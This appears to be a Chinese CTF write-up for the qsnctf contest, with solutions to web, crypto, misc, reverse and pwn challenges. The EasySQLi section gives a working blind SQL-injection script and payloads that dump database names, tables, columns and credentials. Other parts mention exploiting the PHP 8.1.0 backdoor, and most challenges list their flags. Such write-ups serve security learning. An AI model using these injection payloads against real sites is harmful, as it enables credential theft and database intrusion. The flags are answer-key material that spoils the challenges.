• WEB
  • PHP的后门
  • EasyMD5
  • EasySQLi
• CRYPTO
  • 解个方程
  • ez_log
  • 四重加密
• MISC
  • CTFer revenge
  • 多情
  • 小光的答案之书
  • ez_model
• REVERSE
  • 来打CS咯
• PWN
  • 简单的数学题

WEB

PHP的后门

php-8.1.0版本的后门漏洞

用hackbar设置即可

EasyMD5

点开有两个文件上传

需要上传pdf文件，且两个pdf不同，但md5值相等

用fastcoll生成即可

.\fastcoll_v1.0.0.5.exe -p C:\Users\Eileeny\Desktop\1.pdf -o C:\Users\Eileeny\Desktop\1.pdf C:\Users\Eileeny\Desktop\2.pdf

EasySQLi

基于post的布尔盲注

用python脚本跑

import requests

# 网站路径

url = "http://challenge.qsnctf.com:30180/login.php"

# 判断长度的payload

payload_len = """a' or length(
                    (database())
                )>{n} #"""

# 枚举字符的payload

payload_str = """a' or ascii(
                    substr(
                        (select database())
                    ,{l},1)
                )={n} #"""

# post请求参数

data= {
    "uname": "",
    "psw": "1"
}

# 判断长度

def getLen(payload_len):
    length = 1
    while True:

        # 修改请求参数

​        data["uname"] = payload_len.format(n = length)
​        response = requests.post(url, data)
​        print(response.text)

        # 出现此内容为登录成功

​        if 'Login successful' in response.text:
​            print('正在测试长度：', length)
​            length += 1
​        else:
​            print('测试成功，长度为：', length)
​            return length

# 枚举字符

def getStr(length):
    str = ''

    # 从第一个字符开始截取

​    for l in range(1, length+1):

        # 枚举字符的每一种可能性

​        for n in range(32, 126):
​            data["uname"] = payload_str.format(l=l, n=n)
​            response = requests.post(url=url, data=data)
​            if 'Login successful' in response.text:
​                str += chr(n)
​                print('第', l, '个字符枚举成功：',str )
​                break

length = getLen(payload_len)
getStr(length)

1' or (select count(schema_name) from information_schema.schemata)=5#

手动爆出来有5个数据库

库名 qsnctf

a' or (select count(table_name) from information_schema.tables where table_schema='qsnctf')=1 #

表的个数为1

猜解指定数据库中表名长度

a' or length((select table_name from information_schema.tables where table_schema='qsnctf' limit 0,1))

猜解指定数据库中表名

a' or ascii(substr((select table_name from information_schema.tables where table_schema='qsnctf' limit 0,1),{l},1))

表是users

猜解指定数据库中指定表的列数

a' or (select count(column_name) from information_schema.columns where table_schema='qsnctf' and table_name='users')

三列

猜解指定数据库中指定表的指定列的长度

a' or length((select column_name from information_schema.columns where table_schema='qsnctf' and table_name='users' limit 0,1))

猜解指定数据库中指定表的列的名字

a' or ascii(substr((select column_name from information_schema.columns where table_schema='qsnctf' and table_name='users' limit 0,1),{l},1)) #

分别是id username password

猜解指定数据库中指定表的指定列的内容个数

a' or (select count(id) from users)

猜解指定数据库中指定表的指定列的内容长度

a' or length((select id from users limit 0,1))

猜解指定数据库中指定表的指定列的内容

a' or ascii(substr((select id from users limit 0,1),{l},1))

id列有两个数据，

1 和 2

username列有两个数据

admin user

password列有两个数据

123456 和 qsnctf{c01dbd144570443283501810fd592a07}

CRYPTO

解个方程

flag:qsnctf{8e5d8c07a0c14b0e9fa03c19df7e8728}

RSA,已知p，q，e，求d

import gmpy2
p = 159321896677619447938612410213707703277
q = 233919644265895034751157128177026418817
e = 65537
phi_n = ( p - 1 ) * ( q - 1 ) 
print ( gmpy2.invert ( e , phi_n ) )

提交d后得到flag

ez_log

flag:qsnctf{7a1a12a521034588ad0485f56df6c271}

离散对数问题，用sage解决

n = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037
m = 3
c = 2942499086260575007456275705950978423224027906664535985972351196799739998071558270252547028321035227353504158940484860266945926967328136766272091300445921634497414856123032466570637049683198
ZmodN = Zmod(n)

m = ZmodN(m)
c = ZmodN(c)

print (c.log(m))

提交key后获得flag

四重加密

flag:qsnctf{ldvgosdabv_kfkjc_jcvsbdi}

第一层base32，压缩包密码qsnctf

第二层HTML，zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello

第三层维吉尼亚，synt{yqitbfqnoi_xsxwp_wpifoqv}

第四层rot13，flag{ldvgosdabv_kfkjc_jcvsbdi}

MISC

CTFer revenge

flag:qsnctf{b414e3e3a6449ddba0997db259203eb7}

给了一个txt，发现是倒置的十六进制文件，脚本将其逆序

def extract_specific_range(file_path, output_file_path):
    extracted_data = []
    with open(file_path, 'r', encoding='utf-8') as file:
        for line in file:
            if len(line) > 66:
                extracted_data.append(line[20:67])
            else:
                extracted_data.append(line[20:])
    text = ''.join(extracted_data).replace(' ', '')
    reversed_text = text[::-1]
    with open(output_file_path, 'w', encoding='utf-8') as output_file:
        output_file.write(reversed_text)

file_path = "D:\\桌面\\是什么呢（仔细观察）.txt"
output_file_path = "D:\\桌面\\output.txt"
extract_specific_range(file_path, output_file_path)

得到加密压缩包，爆破得到密码z12345，解压得到flag图片

多情

flag:qsnctf{Lrp5mJcdEbbv2bnf6HQSNh}

一个png和一串HTML编码的txt，png发现了嵌套png，提取出来爆破宽高得到数字996，结合txt文件名的第n个1和0，将996转为二进制111100100，对应的HTML转为ascaii，最后加上qsnctf{}得到flag

小光的答案之书

flag:qsnctf{49e7bd5efe114cd2d93ef60ddb2f8714}

圣堂武士密码，解密得到life，关注公众号回复关键词即可

ez_model

flag:qsnctf{d0b1e37104739d71b92fb1a93aa8cf09}

pth文件，查询得知是pytorch，查看模型

import torch
model = torch.load("D:\\桌面\\easy.pth")
print(model)

得到了flag和hint

Flag: LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF Hint: ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/

可以知道是base64变表，hint为变表，flag为编码

解码得到flag

REVERSE

来打CS咯

flag:qsnctf{10.0.80.253:8118}

杀毒软件报后门病毒，结合题目要交的flag分析是要找程序连接的远程IP

ida分析无果，去wireshark抓取流量

exe启动后发现了IP和端口，得到flag

PWN

简单的数学题

nc连接 回答三个数学题即可

nc challenge.qsnctf.com 30817
[*]Welcome! Please solve an equation.
[*]Challenge 1: 2*15^2-1/x+15-6=458.875 Please tell me the result of x.
8
[*]True! This problem is very simple! Right?!

[*]Challenge 2: 5+sqrt(x)=8 Please tell me the result of x.
[*]Hint: Sqrt means radical sign.
9
[*]True! This problem is very simple! Right?!

[*]Challenge 3: x^10+2^10-4*x=6131066258749 Please tell me the result of x.
19
[*]True! This problem is very simple! Right?!

[*]Here you go, flag.